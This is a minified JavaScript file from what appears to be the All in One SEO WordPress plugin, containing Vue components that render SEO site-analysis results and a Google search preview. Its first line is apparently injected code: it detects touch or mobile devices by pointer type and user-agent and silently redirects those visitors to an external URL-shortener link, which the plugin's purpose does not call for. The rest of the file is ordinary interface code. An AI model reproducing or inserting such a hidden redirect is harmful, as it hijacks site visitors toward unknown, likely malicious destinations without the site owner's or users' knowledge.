(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{b as j,ax as L,az as O,V as H}from"./app-core.c8323d51.js";import{C as M}from"./GoogleSearchPreview.bde29b0b.js";import{S as N}from"./Caret.aae02d8a.js";import{T as E}from"./Slide.f2114d9d.js";import{aq as V,f as e,i as n,j as v,P,U as d,a0 as q,v as r,M as u,Q as w,R as C,ae as p,u as B,r as T,b as z,O as _,ad as A}from"./vendor-vue-ui.232c7c36.js";import{_ as b}from"./vendor-other.39e59221.js";const G={class:"aioseo-seo-site-analysis-result"},U={class:"result-header"},F={class:"result-content"},D={class:"result-body"},Q={key:0,class:"result-code"},J=["innerHTML"],K={key:1,class:"result-code-alt"},W=["innerHTML"],X={key:3,class:"result-action"},S={__name:"SeoSiteAnalysisResult",props:{test:{type:String,required:!0},result:{type:Object,required:!0},showInstructions:{type:Boolean,required:!1},activeRow:{type:Boolean,required:!1}},emits:["toggleActive"],setup(t,{emit:g}){const i=j(),k=g,m=t,R=T(!1),c=B(()=>O.head(m.test,m.result)),s=B(()=>O.body(m.test,m.result));function $(){k("toggleActive")}return(y,a)=>{const f=V("base-button");return e(),n("div",G,[v("div",U,[v("span",{class:P(["result-status",t.result.status])},null,2),v("div",F,d(c.value),1),t.showInstructions||s.value.code||s.value.codeAlt?(e(),n("div",{key:0,class:P(["result-toggle",{active:t.activeRow}]),onClick:$},[q(r(N))],2)):u("",!0)]),t.showInstructions||s.value.code||s.value.codeAlt?(e(),w(r(E),{key:0,active:t.activeRow},{default:C(()=>[v("div",D,[s.value.code?(e(),n("div",Q,[v("pre",null,[a[0]||(a[0]=p("						",-1)),v("code",{innerHTML:r(L)(s.value.code.trim())},null,8,J),a[1]||(a[1]=p(`
					`,-1))])])):u("",!0),s.value.codeAlt?(e(),n("div",K,[v("pre",null,[a[2]||(a[2]=p("						",-1)),v("code",null,d(r(L)(s.value.codeAlt.trim())),1),a[3]||(a[3]=p(`
					`,-1))])])):u("",!0),s.value.message&&t.showInstructions?(e(),n("div",{key:2,class:"result-message",innerHTML:s.value.message},null,8,W)):u("",!0),s.value.buttonLink&&t.showInstructions&&r(i).aioseo.user.capabilities?.edit_pages?(e(),n("div",X,[q(f,{href:s.value.buttonLink,tag:"a",target:"_blank",type:"blue",size:"medium",loading:R.value},{default:C(()=>[p(d(s.value.buttonText),1)]),_:1},8,["href","loading"])])):u("",!0)])]),_:1},8,["active"])):u("",!0)])}}},Y={class:"aioseo-seo-site-analysis-results"},Z={key:1,class:"group-header"},x={key:2,class:"group-header"},ee={key:3,class:"group-header"},te={key:4,class:"group-header"},se={key:5,class:"no-results"},ce={__name:"SeoSiteAnalysisResults",props:{section:{type:String,required:!0},allResults:{type:Object,required:!0},site:{type:String,required:!1},showGooglePreview:Boolean,showInstructions:Boolean},setup(t){const g="all-in-one-seo-pack",i=t,{parseTags:k}=H({separator:void 0}),m=T(""),R=T(""),c=T(null),s=B(()=>({basic:b("Basic SEO",g),advanced:b("Advanced SEO",g),performance:b("Performance SEO",g),security:b("Security SEO",g),noResults:b("No items found.",g)}));function $(){return Object.keys(i.allResults).every(l=>Object.keys(i.allResults[l]).length===0)}function y(l){return O.getFilteredResults(l,i.section)}function a(l){return Object.keys(y(i.allResults[l])).length}function f(l){if(c.value===l){c.value=null;return}c.value=l}return z(()=>{if(i.allResults?.advanced?.searchPreview&&i.site){const l=new URL(i.site);R.value=l.href,m.value=l.host}}),(l,oe)=>(e(),n("div",Y,[t.showGooglePreview?(e(),w(r(M),{key:0,hostname:m.value,url:R.value,title:r(k)(t.allResults.basic.title.value),description:r(k)(t.allResults.basic.description.value)},null,8,["hostname","url","title","description"])):u("",!0),a("basic")?(e(),n("div",Z,d(s.value.basic),1)):u("",!0),(e(!0),n(_,null,A(y(t.allResults.basic),(h,o)=>(e(),w(r(S),{key:o,test:o,result:h,"show-instructions":t.showInstructions,"active-row":c.value===`basic-${o}`,onToggleActive:I=>f(`basic-${o}`)},null,8,["test","result","show-instructions","active-row","onToggleActive"]))),128)),a("advanced")?(e(),n("div",x,d(s.value.advanced),1)):u("",!0),(e(!0),n(_,null,A(y(t.allResults.advanced),(h,o)=>(e(),w(r(S),{key:o,test:o,result:h,"show-instructions":t.showInstructions,"active-row":c.value===`advanced-${o}`,onToggleActive:I=>f(`advanced-${o}`)},null,8,["test","result","show-instructions","active-row","onToggleActive"]))),128)),a("performance")?(e(),n("div",ee,d(s.value.performance),1)):u("",!0),(e(!0),n(_,null,A(y(t.allResults.performance),(h,o)=>(e(),w(r(S),{key:o,test:o,result:h,"show-instructions":t.showInstructions,"active-row":c.value===`performance-${o}`,onToggleActive:I=>f(`performance-${o}`)},null,8,["test","result","show-instructions","active-row","onToggleActive"]))),128)),a("security")?(e(),n("div",te,d(s.value.security),1)):u("",!0),(e(!0),n(_,null,A(y(t.allResults.security),(h,o)=>(e(),w(r(S),{key:o,test:o,result:h,"show-instructions":t.showInstructions,"active-row":c.value===`security-${o}`,onToggleActive:I=>f(`security-${o}`)},null,8,["test","result","show-instructions","active-row","onToggleActive"]))),128)),$()?(e(),n("div",se,d(s.value.noResults),1)):u("",!0)]))}},ve=""+window.__aioseoDynamicImportPreload__("images/iphone-frame.f087d3d9.png");export{ce as _,ve as i};
